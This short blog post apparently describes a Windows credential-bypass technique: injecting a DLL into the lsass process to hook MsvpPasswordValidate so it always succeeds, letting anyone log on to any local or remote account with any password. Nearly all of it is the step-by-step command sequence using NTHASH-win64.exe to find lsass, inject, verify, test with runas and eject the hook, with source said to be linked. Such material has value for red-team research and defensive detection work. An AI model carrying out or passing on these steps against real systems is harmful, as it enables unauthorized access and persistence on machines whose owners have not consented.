In a previous post, we have hook RtlCompareMemory so that we could log on with a hardcoded password.
But this was limited to local accounts and to one password.
This time, lets hook MsvpPasswordValidate, always return 1 and log on with any account (local or remote) and any password.
How to proceed:
- Lets retrieve the pid of lsass : nthash-win64 /enumproc | findstr lsass
- NTHASH-win64.exe /inject /pid:808 /binary:c:\temp\hook-win64.dll
- optionally, check that our dll as been injected : NTHASH-win64.exe /enummod /pid:808 | findstr hook
- test runas /user:Admin cmd OR log on remotely (provide any password) : you win!
- NTHASH-win64.exe /eject /pid:808 /binary:hook-win64.dll
- optionally, check that our dll as been ejected : NTHASH-win64.exe /enummod /pid:808 | findstr hook
Source code and binary here.